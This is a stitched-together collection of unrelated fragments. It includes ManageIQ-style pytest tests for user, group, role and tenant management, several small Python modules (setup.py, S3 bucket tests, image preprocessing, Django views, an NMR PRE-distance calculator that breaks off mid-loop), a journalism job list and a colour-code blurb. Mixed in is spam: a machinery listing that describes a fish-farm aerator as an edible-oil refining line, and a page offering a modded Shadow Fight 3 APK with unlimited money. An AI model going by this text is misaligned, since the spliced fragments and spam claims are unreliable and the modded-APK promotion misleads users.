email='xyz@redhat.com',
group=group_user)
if version.current_version() < "5.5":
check = "Password_digest can't be blank"
else:
check = "Password can't be blank"
with error.expected(check):
user.create()
@pytest.mark.tier(3)
def test_user_group_error_validation():
user = User(
name='user' + fauxfactory.gen_alphanumeric(),
credential=new_credential(),
email='xyz@redhat.com',
group='')
with error.expected("A User must be assigned to a Group"):
user.create()
@pytest.mark.tier(3)
def test_user_email_error_validation():
user = User(
name='user' + fauxfactory.gen_alphanumeric(),
credential=new_credential(),
email='xyzdhat.com',
group=group_user)
with error.expected("Email must be a valid email address"):
user.create()
@pytest.mark.tier(2)
def test_user_edit_tag():
user = new_user()
user.create()
user.edit_tags("Cost Center *", "Cost Center 001")
assert get_tag() == "Cost Center: Cost Center 001", "User edit tag failed"
user.delete()
@pytest.mark.tier(3)
def test_user_remove_tag():
user = new_user()
user.create()
user.edit_tags("Department", "Engineering")
user.remove_tag("Department", "Engineering")
navigate_to(user, 'Details')
assert get_tag() != "Department: Engineering", "Remove User tag failed"
user.delete()
@pytest.mark.tier(3)
def test_delete_default_user():
"""Test for deleting default user Administrator.
Steps:
* Login as Administrator user
* Try deleting the user
"""
user = User(name='Administrator')
navigate_to(User, 'All')
column = version.pick({version.LOWEST: "Name",
"5.4": "Full Name"})
row = records_table.find_row_by_cells({column: user.name})
sel.check(sel.element(".//input[@type='checkbox']", root=row[0]))
tb.select('Configuration', 'Delete selected Users', invokes_alert=True)
sel.handle_alert()
flash.assert_message_match('Default EVM User "{}" cannot be deleted' .format(user.name))
@pytest.mark.tier(3)
@pytest.mark.meta(automates=[BZ(1090877)])
@pytest.mark.meta(blockers=[BZ(1408479)], forced_streams=["5.7", "upstream"])
@pytest.mark.uncollectif(lambda: version.current_version() >= "5.7")
def test_current_user_login_delete(request):
"""Test for deleting current user login.
Steps:
* Login as Admin user
* Create a new user
* Login with the new user
* Try deleting the user
"""
group_user = Group("EvmGroup-super_administrator")
user = User(
name='user' + fauxfactory.gen_alphanumeric(),
credential=new_credential(),
email='xyz@redhat.com',
group=group_user)
user.create()
request.addfinalizer(user.delete)
request.addfinalizer(user.appliance.server.login_admin())
with user:
if version.current_version() >= '5.7':
navigate_to(user, 'Details')
menu_item = ('Configuration', 'Delete this User')
assert tb.exists(*menu_item) and tb.is_greyed(*menu_item), "Delete User is not dimmed"
else:
with error.expected("Current EVM User \"{}\" cannot be deleted".format(user.name)):
user.delete()
@pytest.mark.tier(3)
def test_tagvis_user(user_restricted, check_item_visibility):
""" Tests if group honour tag visibility feature
Prerequirement:
Catalog, tag, role, group and restricted user should be created
Steps:
1. As admin add tag to group
2. Login as restricted user, group is visible for user
3. As admin remove tag from group
4. Login as restricted user, group is not visible for user
"""
check_item_visibility(user_restricted, user_restricted)
@pytest.mark.tier(2)
# Group test cases
def test_group_crud():
group = new_group()
group.create()
with update(group):
group.description = group.description + "edited"
group.delete()
@pytest.mark.tier(2)
def test_group_crud_with_tag(a_provider, category, tag):
"""Test for verifying group create with tag defined
Steps:
* Login as Admin user
* Navigate to add group page
* Fill all fields
* Set tag
* Save group
"""
group = Group(
description='grp{}'.format(fauxfactory.gen_alphanumeric()),
role='EvmRole-approver',
tag=[category.display_name, tag.display_name],
host_cluster=[a_provider.data['name']],
vm_template=[a_provider.data['name'], a_provider.data['datacenters'][0],
'Discovered virtual machine']
)
group.create()
with update(group):
group.tag = [tag.category.display_name, tag.display_name]
group.host_cluster = [a_provider.data['name']]
group.vm_template = [a_provider.data['name'], a_provider.data['datacenters'][0],
'Discovered virtual machine']
group.delete()
@pytest.mark.tier(3)
def test_group_duplicate_name(appliance):
region = appliance.server_region
group = new_group()
group.create()
msg = version.pick({
version.LOWEST: "Description has already been taken",
'5.8': "Description is not unique within region {}".format(region)
})
with error.expected(msg):
group.create()
@pytest.mark.tier(2)
def test_group_edit_tag():
group = new_group()
group.create()
group.edit_tags("Cost Center *", "Cost Center 001")
assert get_tag() == "Cost Center: Cost Center 001", "Group edit tag failed"
group.delete()
@pytest.mark.tier(2)
def test_group_remove_tag():
group = new_group()
group.create()
navigate_to(group, 'Edit')
group.edit_tags("Department", "Engineering")
group.remove_tag("Department", "Engineering")
assert get_tag() != "Department: Engineering", "Remove Group tag failed"
group.delete()
@pytest.mark.tier(3)
def test_group_description_required_error_validation():
error_text = "Description can't be blank"
group = Group(description=None, role='EvmRole-approver')
with error.expected(error_text):
group.create()
flash.dismiss()
@pytest.mark.tier(3)
def test_delete_default_group():
flash_msg = "EVM Group \"{}\": Error during delete: A read only group cannot be deleted."
group = Group(description='EvmGroup-administrator')
view = navigate_to(Group, 'All')
row = group_table.find_row_by_cells({'Name': group.description})
sel.check(sel.element(".//input[@type='checkbox']", root=row[0]))
view.configuration.item_select('Delete selected Groups', handle_alert=True)
view.flash.assert_message(flash_msg.format(group.description))
@pytest.mark.tier(3)
def test_delete_group_with_assigned_user():
flash_msg = version.pick({
'5.6': ("EVM Group \"{}\": Error during delete: Still has users assigned"),
'5.5': ("EVM Group \"{}\": Error during \'destroy\': Still has users assigned")})
group = new_group()
group.create()
user = new_user(group=group)
user.create()
with error.expected(flash_msg.format(group.description)):
group.delete()
@pytest.mark.tier(3)
def test_edit_default_group():
flash_msg = 'Read Only EVM Group "{}" can not be edited'
group = Group(description='EvmGroup-approver')
navigate_to(Group, 'All')
row = group_table.find_row_by_cells({'Name': group.description})
sel.check(sel.element(".//input[@type='checkbox']", root=row[0]))
tb.select('Configuration', 'Edit the selected Group')
flash.assert_message_match(flash_msg.format(group.description))
@pytest.mark.tier(3)
def test_edit_sequence_usergroups(request):
"""Test for editing the sequence of user groups for LDAP lookup.
Steps:
* Login as Administrator user
* create a new group
* Edit the sequence of the new group
* Verify the changed sequence
"""
group = new_group()
group.create()
request.addfinalizer(group.delete)
view = navigate_to(Group, 'All')
row = view.table.row(name=group.description)
original_sequence = row.sequence.text
group.set_group_order(group.description)
row = view.table.row(name=group.description)
changed_sequence = row.sequence.text
assert original_sequence != changed_sequence, "Edit Sequence Failed"
@pytest.mark.tier(3)
def test_tagvis_group(user_restricted, group_with_tag, check_item_visibility):
""" Tests if group honour tag visibility feature
Prerequirement:
Catalog, tag, role, group and restricted user should be created
Steps:
1. As admin add tag to group
2. Login as restricted user, group is visible for user
3. As admin remove tag from group
4. Login as restricted user, group is not visible for user
"""
check_item_visibility(group_with_tag, user_restricted)
# Role test cases
@pytest.mark.tier(2)
def test_role_crud():
role = new_role()
role.create()
with update(role):
role.name = role.name + "edited"
copied_role = role.copy()
copied_role.delete()
role.delete()
@pytest.mark.tier(3)
def test_rolename_required_error_validation():
role = Role(
name=None,
vm_restriction='Only User Owned')
with error.expected("Name can't be blank"):
role.create()
@pytest.mark.tier(3)
def test_rolename_duplicate_validation():
role = new_role()
role.create()
with error.expected("Name has already been taken"):
role.create()
@pytest.mark.tier(3)
def test_delete_default_roles():
flash_msg = version.pick({
'5.6': ("Role \"{}\": Error during delete: Cannot delete record "
"because of dependent entitlements"),
'5.5': ("Role \"{}\": Error during \'destroy\': Cannot delete record "
"because of dependent miq_groups")})
role = Role(name='EvmRole-approver')
with error.expected(flash_msg.format(role.name)):
role.delete()
@pytest.mark.tier(3)
def test_edit_default_roles():
role = Role(name='EvmRole-auditor')
navigate_to(role, 'Edit')
flash.assert_message_match("Read Only Role \"{}\" can not be edited" .format(role.name))
@pytest.mark.tier(3)
def test_delete_roles_with_assigned_group():
flash_msg = version.pick({
'5.6': ("Role \"{}\": Error during delete: Cannot delete record "
"because of dependent entitlements"),
'5.5': ("Role \"{}\": Error during \'destroy\': Cannot delete record "
"because of dependent miq_groups")})
role = new_role()
role.create()
group = new_group(role=role.name)
group.create()
with error.expected(flash_msg.format(role.name)):
role.delete()
@pytest.mark.tier(3)
def test_assign_user_to_new_group():
role = new_role() # call function to get role
role.create()
group = new_group(role=role.name)
group.create()
user = new_user(group=group)
user.create()
def _test_vm_provision():
logger.info("Checking for provision access")
navigate_to(vms.Vm, 'VMsOnly')
vms.lcl_btn("Provision VMs")
def _test_vm_power_on():
"""Ensures power button is shown for a VM"""
logger.info("Checking for power button")
vm_name = vms.Vm.get_first_vm_title()
logger.debug("VM " + vm_name + " selected")
if not vms.is_pwr_option_visible(vm_name, option=vms.Vm.POWER_ON):
raise OptionNotAvailable("Power button does not exist")
def _test_vm_removal():
logger.info("Testing for VM removal permission")
vm_name = vms.get_first_vm()
logger.debug("VM " + vm_name + " selected")
vms.remove(vm_name, cancel=True)
@pytest.mark.tier(3)
@pytest.mark.parametrize(
'product_features, action',
[(
{version.LOWEST: [['Everything', 'Infrastructure', 'Virtual Machines', 'Accordions'],
['Everything', 'Access Rules for all Virtual Machines', 'VM Access Rules', 'Modify',
'Provision VMs']],
'5.6': [['Everything', 'Compute', 'Infrastructure', 'Virtual Machines', 'Accordions'],
['Everything', 'Access Rules for all Virtual Machines', 'VM Access Rules', 'Modify',
'Provision VMs']]},
_test_vm_provision)])
def test_permission_edit(appliance, request, product_features, action):
"""
Ensures that changes in permissions are enforced on next login
"""
product_features = version.pick(product_features)
request.addfinalizer(appliance.server.login_admin())
role_name = fauxfactory.gen_alphanumeric()
role = Role(name=role_name,
vm_restriction=None,
product_features=[(['Everything'], False)] + # role_features
[(k, True) for k in product_features])
role.create()
group = new_group(role=role.name)
group.create()
user = new_user(group=group)
user.create()
with user:
try:
action()
except Exception:
pytest.fail('Incorrect permissions set')
appliance.server.login_admin()
role.update({'product_features': [(['Everything'], True)] +
[(k, False) for k in product_features]
})
with user:
try:
with error.expected(Exception):
action()
except error.UnexpectedSuccessException:
pytest.Fails('Permissions have not been updated')
def _mk_role(name=None, vm_restriction=None, product_features=None):
"""Create a thunk that returns a Role object to be used for perm
testing. name=None will generate a random name
"""
name = name or fauxfactory.gen_alphanumeric()
return lambda: Role(name=name,
vm_restriction=vm_restriction,
product_features=product_features)
def _go_to(cls, dest='All'):
"""Create a thunk that navigates to the given destination"""
return lambda: navigate_to(cls, dest)
cat_name = "Settings"
@pytest.mark.tier(3)
@pytest.mark.parametrize(
'role,allowed_actions,disallowed_actions',
[[_mk_role(product_features=[[['Everything'], False], # minimal permission
[['Everything', cat_name, 'Tasks'], True]]),
{'tasks': lambda: sel.click(tasks.buttons.default)}, # can only access one thing
{
'my services': _go_to(MyService),
'chargeback': _go_to(Server, 'Chargeback'),
'clouds providers': _go_to(base_types()['cloud']),
'infrastructure providers': _go_to(base_types()['infra']),
'control explorer': _go_to(Server, 'ControlExplorer'),
'automate explorer': _go_to(Server, 'AutomateExplorer')}],
[_mk_role(product_features=[[['Everything'], True]]), # full permissions
{
'my services': _go_to(MyService),
'chargeback': _go_to(Server, 'Chargeback'),
'clouds providers': _go_to(base_types()['cloud']),
'infrastructure providers': _go_to(base_types()['infra']),
'control explorer': _go_to(Server, 'ControlExplorer'),
'automate explorer': _go_to(Server, 'AutomateExplorer')},
{}]])
@pytest.mark.meta(blockers=[1262759])
def test_permissions(appliance, role, allowed_actions, disallowed_actions):
# create a user and role
role = role() # call function to get role
role.create()
group = new_group(role=role.name)
group.create()
user = new_user(group=group)
user.create()
fails = {}
try:
with user:
appliance.server.login_admin()
for name, action_thunk in allowed_actions.items():
try:
action_thunk()
except Exception:
fails[name] = "{}: {}".format(name, traceback.format_exc())
for name, action_thunk in disallowed_actions.items():
try:
with error.expected(Exception):
action_thunk()
except error.UnexpectedSuccessException:
fails[name] = "{}: {}".format(name, traceback.format_exc())
if fails:
message = ''
for failure in fails.values():
message = "{}\n\n{}".format(message, failure)
raise Exception(message)
finally:
appliance.server.login_admin()
def single_task_permission_test(appliance, product_features, actions):
"""Tests that action succeeds when product_features are enabled, and
fail when everything but product_features are enabled"""
test_permissions(appliance, _mk_role(name=fauxfactory.gen_alphanumeric(),
product_features=[(['Everything'], False)] +
[(f, True) for f in product_features]),
actions,
{})
test_permissions(appliance, _mk_role(name=fauxfactory.gen_alphanumeric(),
product_features=[(['Everything'], True)] +
[(f, False) for f in product_features]),
{},
actions)
@pytest.mark.tier(3)
@pytest.mark.meta(blockers=[1262764])
def test_permissions_role_crud(appliance):
single_task_permission_test(appliance,
[['Everything', cat_name, 'Configuration'],
['Everything', 'Services', 'Catalogs Explorer']],
{'Role CRUD': test_role_crud})
@pytest.mark.tier(3)
def test_permissions_vm_provisioning(appliance):
features = version.pick({
version.LOWEST: [
['Everything', 'Infrastructure', 'Virtual Machines', 'Accordions'],
['Everything', 'Access Rules for all Virtual Machines', 'VM Access Rules', 'Modify',
'Provision VMs']
],
'5.6': [
['Everything', 'Compute', 'Infrastructure', 'Virtual Machines', 'Accordions'],
['Everything', 'Access Rules for all Virtual Machines', 'VM Access Rules', 'Modify',
'Provision VMs']
]})
single_task_permission_test(
appliance,
features,
{'Provision VM': _test_vm_provision}
)
# This test is disabled until it has been rewritten
# def test_permissions_vm_power_on_access(appliance):
# # Ensure VMs exist
# if not vms.get_number_of_vms():
# logger.debug("Setting up providers")
# infra_provider
# logger.debug("Providers setup")
# single_task_permission_test(
# appliance,
# [
# ['Infrastructure', 'Virtual Machines', 'Accordions'],
# ['Infrastructure', 'Virtual Machines', 'VM Access Rules', 'Operate', 'Power On']
# ],
# {'VM Power On': _test_vm_power_on}
# )
# This test is disabled until it has been rewritten
# def test_permissions_vm_remove(appliance):
# # Ensure VMs exist
# if not vms.get_number_of_vms():
# logger.debug("Setting up providers")
# setup_infrastructure_providers()
# logger.debug("Providers setup")
# single_task_permission_test(
# appliance,
# [
# ['Infrastructure', 'Virtual Machines', 'Accordions'],
# ['Infrastructure', 'Virtual Machines', 'VM Access Rules', 'Modify', 'Remove']
# ],
# {'Remove VM': _test_vm_removal}
# )
# commenting this out, there is validation around the 'no group selected'and we have a test for it
# @pytest.mark.meta(blockers=[1154112])
# def test_user_add_button_should_be_disabled_without_group(soft_assert):
# from cfme.web_ui import fill, form_buttons
# navigate_to(User, 'Add')
# pw = fauxfactory.gen_alphanumeric()
# fill(User.user_form, {
# "name_txt": fauxfactory.gen_alphanumeric(),
# "userid_txt": fauxfactory.gen_alphanumeric(),
# "password_txt": pw,
# "password_verify_txt": pw,
# "email_txt": "test@test.test"
# })
# assert not sel.is_displayed(form_buttons.add), "The Add button should not be displayed!"
@pytest.mark.tier(2)
def test_user_change_password(appliance, request):
user = User(
name="user {}".format(fauxfactory.gen_alphanumeric()),
credential=Credential(
principal="user_principal_{}".format(fauxfactory.gen_alphanumeric()),
secret="very_secret",
verify_secret="very_secret"
),
email="test@test.test",
group=usergrp,
)
user.create()
request.addfinalizer(user.delete)
request.addfinalizer(appliance.server.login_admin())
with user:
appliance.server.logout()
appliance.server.login(user)
assert appliance.server.current_full_name() == user.name
appliance.server.login_admin()
with update(user):
user.credential = Credential(
principal=user.credential.principal,
secret="another_very_secret",
verify_secret="another_very_secret",
)
with user:
appliance.server.logout()
appliance.server.login(user)
assert appliance.server.current_full_name() == user.name
# Tenant/Project test cases
@pytest.mark.tier(3)
def test_superadmin_tenant_crud(request):
"""Test suppose to verify CRUD operations for CFME tenants
Prerequisities:
* This test is not depending on any other test and can be executed against fresh appliance.
Steps:
* Create tenant
* Update description of tenant
* Update name of tenat
* Delete tenant
"""
tenant = Tenant(
name='tenant1' + fauxfactory.gen_alphanumeric(),
description='tenant1 description')
@request.addfinalizer
def _delete_tenant():
if tenant.exists:
tenant.delete()
tenant.create()
with update(tenant):
tenant.description = tenant.description + "edited"
with update(tenant):
tenant.name = tenant.name + "edited"
tenant.delete()
@pytest.mark.tier(3)
@pytest.mark.meta(blockers=[BZ(1387088, forced_streams=['5.7', 'upstream'])])
def test_superadmin_tenant_project_crud(request):
"""Test suppose to verify CRUD operations for CFME projects
Prerequisities:
* This test is not depending on any other test and can be executed against fresh appliance.
Steps:
* Create tenant
* Create project as child to tenant
* Update description of project
* Update name of project
* Delete project
* Delete tenant
"""
tenant = Tenant(
name='tenant1' + fauxfactory.gen_alphanumeric(),
description='tenant1 description')
project = Project(
name='project1' + fauxfactory.gen_alphanumeric(),
description='project1 description',
parent_tenant=tenant)
@request.addfinalizer
def _delete_tenant_and_project():
for item in [project, tenant]:
if item.exists:
item.delete()
tenant.create()
project.create()
with update(project):
project.description = project.description + "edited"
with update(project):
project.name = project.name + "edited"
project.delete()
tenant.delete()
@pytest.mark.tier(3)
@pytest.mark.parametrize('number_of_childrens', [5])
def test_superadmin_child_tenant_crud(request, number_of_childrens):
"""Test CRUD operations for CFME child tenants, where several levels of tenants are created.
Prerequisities:
* This test is not depending on any other test and can be executed against fresh appliance.
Steps:
* Create 5 tenants where the next tenant is always child to the previous one
* Update description of tenant(N-1)_* in the tree
* Update name of tenant(N-1)_*
* Delete all created tenants in reversed order
"""
tenant = None
tenant_list = []
@request.addfinalizer
def _delete_tenants():
# reversed because we need to go from the last one
for tenant in reversed(tenant_list):
if tenant.exists:
tenant.delete()
for i in range(1, number_of_childrens + 1):
new_tenant = Tenant(
name="tenant{}_{}".format(i, fauxfactory.gen_alpha(4)),
description=fauxfactory.gen_alphanumeric(16),
parent_tenant=tenant)
tenant_list.append(new_tenant)
new_tenant.create()
tenant = new_tenant
tenant_update = tenant.parent_tenant
with update(tenant_update):
tenant_update.description = tenant_update.description + "edited"
with update(tenant_update):
tenant_update.name = tenant_update.name + "edited"
for tenant_item in reversed(tenant_list):
tenant_item.delete()
assert not tenant_item.exists
|
Buy aerator for fish farm /aerator pump 008613676951397 - Shandong Microwave Machinery Co.,Ltd.
aerator for fish farm /aerator pump 008613676951397 is according to the different usage and requirements, utilizing the physical methods and chemical processes to get rid of the harmful impurities and needless substance in the crude oil, getting standard oil.
(1)aerator for fish farm /aerator pump 008613676951397Pump crude oil into refining tank and heat with conduction oil, and the temperature will reach about 70°C-80°C after one hour. Add acid or alkali to separate according to the acid value. After one hour's processing and 4-6 hours deposit, then convey soap stock to storage tank.
(3aerator for fish farm /aerator pump 008613676951397)Put discolored oil into deodorization tank with vacuum pump. Heat and process with steam for odor removal.
Shandong Microwave Machinery Co.,Ltd.is a Tartary buckwheat dehulling and separating equipment factory specializing in the production of aerator for fish farm /aerator pump 008613676951397, scientific research,manufacturing,installation, commissioning.Shandong Microwave Machinery Co.,Ltd.can provide Tartary buckwheat dehulling and separating equipmentcustomers with design and services of 1-2000 tons aerator for fish farm /aerator pump 008613676951397. Shandong Microwave Machinery Co.,Ltd. have finished hundreds of successful projects Tartary buckwheat dehulling and separating equipmentover the years: peanut oil, soybean oil, rapeseed oil, cottonseed oil, sunflower oil, sesame oil, animal oil,grape seed oil, acer truncatum oil, peony seed oil, walnut oil, hemp seed oil, pine oil, tea seed oil, papaya oil, milk thistle seed, and other special type Tartary buckwheat dehulling and separating equipmentoil. Shandong Microwave Machinery Co.,Ltd. have independent import and export department. Shandong Microwave Machinery Co.,Ltd. Tartary buckwheat dehulling and separating equipmentequipment has been successfully exported to more than ten countries: Russia, Australia, India, Afghanistan, Cameroon,and so on.
|
#!/usr/bin/python
# Copyright 2011-2012 Nexenta Systems Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from setuptools import setup, find_packages
from swift_lfs import __version__ as version
name = 'swift_lfs'
setup(
name=name,
version=version,
description='Swift LFS middleware',
license='Apache License (2.0)',
author='Nexenta Systems Inc',
author_email='victor.rodionov@nexenta.com',
url='https://github.com/Nexenta/lfs',
packages=find_packages(exclude=['test_lfs']),
test_suite='nose.collector',
classifiers=[
'Development Status :: 4 - Beta',
'License :: OSI Approved :: Apache Software License',
'Operating System :: POSIX :: Linux',
'Programming Language :: Python :: 2.6',
'Environment :: No Input/Output (Daemon)',
],
requires=['swift(>=1.4.7)'],
entry_points={
'paste.filter_factory': [
'swift_lfs=swift_lfs.lfs:filter_factory',
],
},
)
|
Assistant Editor, Wilma TV/Discovery Studios, Silver Spring, MD.
Associate Producer for Early Light Media, Baltimore, MD.
Communications Associate, AAAS, Washington, D.C.
Contractor/Video Production Assistant at Federal Reserve Board.
Donor Relations, Customer Service and Office Management at Campaign Solutions.
Day Part Manager (Producer) & Administrative Associate Journalist WNEW 99.1FM at CBS Radio.
Digital Content Programmer at FOX Sports.
Education Reporter at KFYR-TV, Bismark, ND.
Freelance Production Assistant for WPIX-TV, NYC.
High School Sports producer/Digital-Mobile-Social Web producer at WUSA9, Washington, D.C.
Independent Content Quality Editor at Quora.
Multimedia Journalist at News 19, WLTX, Columbia, SC.
News Reporter at Eyewitness News (WEHT/WTVW) in Evansville, In.
Production Assistant with NPR’s “Morning Edition, Washington, D.C.
Producer, Reporter, Anchor for Univision in Raleigh, NC.
Production Assistant for Big Ten Student U.
Reporter/Photojournalist at WHSV – TV / Gray Television, Staunton, VA.
Social Media Strategist at Society for Science & the Public.
Sports Reporter Laurel TV, Reporter for The Roundball Report, Sideline/Multimedia Reporter for HSRN.
Staff Reporter for the The Daily Review, Bradford and Sullivan counties, PA. and Tioga County, NY.
Video Production Assistant with Zerosun Creative, Denver, CO.
Intern at Sirius XM Radio Inc.
Project Coordinator at Maga Design, Inc.
|
from formica.s3 import temporary_bucket
import pytest
from .constants import STACK
@pytest.fixture
def bucket(mocker, boto_resource, boto_client):
return boto_resource.return_value.Bucket
STRING_BODY = "string"
# MD5 hash of body
STRING_KEY = "b45cffe084dd3d20d928bee85e7b0f21"
BINARY_BODY = "binary".encode()
BINARY_KEY = "9d7183f16acce70658f686ae7f1a4d20"
BUCKET_NAME = "formica-deploy-88dec80484e3155b2c8cf023b635fb31"
FILE_NAME = "testfile"
FILE_BODY = "file-body"
FILE_KEY = "de858a1b070b29a579e2d8861b53ad20"
def test_s3_bucket_context(mocker, bucket, uuid4, boto_client):
bucket.return_value.objects.all.return_value = [mocker.Mock(key=STRING_KEY), mocker.Mock(key=BINARY_KEY)]
boto_client.return_value.meta.region_name = "eu-central-1"
boto_client.return_value.get_caller_identity.return_value = {'Account': '1234'}
mock_open = mocker.mock_open(read_data=FILE_BODY.encode())
mocker.patch('formica.s3.open', mock_open)
with temporary_bucket(seed=STACK) as temp_bucket:
string_return = temp_bucket.add(STRING_BODY)
binary_return = temp_bucket.add(BINARY_BODY)
file_return = temp_bucket.add_file(FILE_NAME)
temp_bucket.upload()
bucket_name = temp_bucket.name
assert string_return == STRING_KEY
assert binary_return == BINARY_KEY
assert file_return == FILE_KEY
assert bucket_name == BUCKET_NAME
bucket.assert_called_once_with(BUCKET_NAME)
assert bucket.call_count == 1
assert mock_open.call_count == 2
location_parameters = {'CreateBucketConfiguration': dict(LocationConstraint='eu-central-1')}
calls = [mocker.call(Body=STRING_BODY.encode(), Key=STRING_KEY), mocker.call(Body=BINARY_BODY, Key=BINARY_KEY), mocker.call(Body=mock_open(), Key=FILE_KEY)]
bucket.return_value.create.assert_called_once_with(**location_parameters)
bucket.return_value.put_object.assert_has_calls(calls)
assert bucket.return_value.put_object.call_count == 3
bucket.return_value.delete_objects.assert_called_once_with(
Delete={'Objects': [{'Key': STRING_KEY}, {'Key': BINARY_KEY}]})
bucket.return_value.delete.assert_called_once_with()
def test_does_not_delete_objects_if_empty(bucket):
bucket.return_value.objects.all.return_value = []
with temporary_bucket(seed=STACK):
pass
bucket.return_value.delete_objects.assert_not_called()
def test_does_not_use_s3_api_when_planning(bucket):
bucket.return_value.objects.all.return_value = []
with temporary_bucket(seed=STACK) as temp_bucket:
temp_bucket.add(STRING_BODY)
temp_bucket.add(BINARY_BODY)
bucket.return_value.create.assert_not_called()
bucket.return_value.put_object.assert_not_called()
bucket.return_value.delete_objects.assert_not_called()
|
Shadow Fight 3 Apk + OBB + Mod unlimited money and gems - Free games and Apps, You Download for Free, A lot Of Top popular Games with Mod Unlocked For Android.
On our site android-1.cc you can easily download Shadow Fight 3 All without registration and send SMS!
Shadow Fight 3 game it all depends on you, because you can build and destroy everything you want.
This game Shadow Fight 3 story will swallow you whole, because you will spend a lot of time creating everything from scratch.
Shadow Fight 3 app colorful graphics and easy management.
Shadow Fight 3 Game Reviews and Download Apps Free. Latest Games Features and Specifications.
|
#!/usr/bin/env python
#encoding: utf-8
import numpy as np
from PIL import Image
def create_data(file):
data_list = []
with open(file, 'r') as f:
for line in f:
line = line.rstrip('\n').split(' ')
feature_dict = {}
for l in line[1:]:
ls = l.split(':')
feature_dict[ls[0]] = ls[1]
data_list.append([line[0], feature_dict])
return data_list
def find_m_index(n):
"""find matrix index giving feature index"""
return (n - 1) / 105, (n - 1) % 105
def find_f_index(x, col):
"""find feature index giving matrix index"""
return x[0] * col + x[1] + 1
def cut_blank(image, filename):
feature = image[1]
# find matrix index and remove noise
matrix_index = {find_m_index(int(f)):float(feature[f]) for f in feature
if float(feature[f]) > 0.35}
if matrix_index:
row_index = [m[0] for m in matrix_index]
col_index = [m[1] for m in matrix_index]
matrix_cut = {(m[0] - min(row_index),m[1] - min(col_index)):matrix_index[m]
for m in matrix_index}
col_range = max(col_index) - min(col_index) + 1
row_range = max(row_index) - min(row_index) + 1
create_image(filename, matrix_cut, row_range, col_range)
else:
create_image(filename, matrix_index, 60, 60)
def create_image(filename, matrix_index, nrow, ncol, normalize = False, t = 0):
matrix_init = np.zeros((nrow, ncol))
for i in matrix_index:
if normalize:
if float(matrix_index[i]) > t:
matrix_init[i[0]][i[1]] = 255
else:
matrix_init[i[0]][i[1]] = float(matrix_index[i]) * 255
im = Image.fromarray(matrix_init)
image_name = 'image/' + filename + '.jpg'
im.convert('RGB').save(image_name)
def image_preprocessing(image_data, dir_name):
#image_valid = [image for image in image_data if len(image_data[1])>0]
for idx, image in enumerate(image_data):
filename = dir_name + str(idx) + '_' + str(image[0])
print filename
cut_blank(image, filename)
if __name__ == "__main__":
image_train = create_data('ml14fall_train.dat')
image_test = create_data('ml14fall_test1_no_answer.dat')
image_preprocessing(image_train, 'train/')
image_preprocessing(image_test, 'test/')
|
The hexadecimal color code #242e2f is a dark shade of cyan. In the RGB color model #242e2f is comprised of 14.12% red, 18.04% green and 18.43% blue. In the HSL color space #242e2f has a hue of 185° (degrees), 13% saturation and 16% lightness. This color has an approximate wavelength of 489.54 nm.
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.shortcuts import get_object_or_404
from django.views.generic.detail import DetailView
from .models import Page
from meta.views import MetadataMixin
class MetaTagsMexin(MetadataMixin):
""" Mixin for show meta tegs from django-meta """
def get_meta_description(self, context):
return self.page.meta_description
def get_meta_keywords(self, context):
keywords_str = self.page.meta_keywords
if keywords_str:
return [c.strip() for c in keywords_str.split(',')]
def get_meta_title(self, context):
return self.page.meta_title or self.page.name
class HomePageView(MetaTagsMexin, DetailView):
model = Page
context_object_name = 'page'
template_name = 'page/homepage.html'
def get_context_data(self, **kwargs):
context = super(HomePageView, self).get_context_data(**kwargs)
return context
def get_object(self):
page = get_object_or_404(self.model, slug='home')
self.page = page
return page
class PageDetailView(MetaTagsMexin, DetailView):
model = Page
context_object_name = 'page'
template_name = 'page/default.html'
def get_object(self):
page = get_object_or_404(self.model, path=self.request.path, active=1)
self.page = page
return page
def get_template_names(self):
return ["page/%s.html" % self.page.template]
|
A soft and elegant feather chandelier with brass accents. A stunning centre piece for a stylish interior. Decadent goose feathers create truly soft lighting that is beautifully strokeable. The brass ball chain hangs in a geometric pattern giving a contemporary edge. A pale gold bouclé trim finishes the piece.
Please note the shade does not come with a flex - it attaches to an existing pendant fitting. Takes a single E27 bulb.
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Created by Zoltan Bozoky on 2014.07.02.
Under GPL licence.
Purpose:
========
Calculate PRE distances.
Note:
=====
The actual pre data is stored as a power of -6 in the bcd file!
"""
# Built-ins
# 3rd party modules
import numpy as np
# Project modules
from disconf.predict.predictor import Predictor
from disconf import fileio
def distance2pre(distance_data):
"""
Convert distance data to pre value stores as -6 power.
Note:
PRE distance: value = pow(distance, -6) <=> distance(value, -1.0/6.0)
"""
#
return np.power(distance_data, -6)
### ======================================================================== ###
def pre2distance(pre_data):
"""
Convert stored PRE value, saved in power(-6) to angstrom
Note:
PRE distance: value = pow(distance, -6) <=> distance(value, -1.0/6.0)
"""
#
return np.power(pre_data, -1.0 / 6.0)
### ======================================================================== ###
class Pre(Predictor):
"""
PRE distance calcutations.
"""
def __init__(self, kwarg):
"""
Parameters:
===========
No extra argument is required!
"""
# ---------------------------------
# Initialize general parameters
# ---------------------------------
Predictor.__init__(self, kwarg)
# ---------------------------------
# Define restraint name
# ---------------------------------
self._name = 'pre'
#
return None
### ==================================================================== ###
def predict(self, pdb_filename, **kwarg):
"""
Calculates the atom - atom distance for PRE fitting
Parameters:
===========
* labels
* coordinates
"""
print ' >>> PARAMAGNETIC RELAXATION ENHANCEMENT BACK CALCULATION'
# ---------------------------------
# Get the structure data
# ---------------------------------
if (('labels' in kwarg) and ('coodinates' in kwarg)):
labels = kwarg['labels']
coordinates = kwarg['coordinates']
else:
# Get the cooredinates from the pdb file
labels, coordinates = fileio.read_pdb_file(pdb_filename)
# ---------------------------------
# Extract the residue number and atom name and put into a dictionary
# ---------------------------------
residue_number_atom_name = {}
for i in xrange(len(labels)):
atom_name = labels[i][12:16].strip()
residue_number = int(labels[i][22:26])
residue_number_atom_name[(residue_number, atom_name)] = i
# ---------------------------------
# Container to store the back calculated data
# ---------------------------------
pre_data = np.empty(shape = (self.experimental_data[self.name]['size']),
dtype = np.float32)
# ---------------------------------
# Iterate through all experimantal datapoints
# ---------------------------------
for i in xrange(self.experimental_data[self.name]['size']):
resi1 = self.experimental_data[self.name]['resi1'][i]
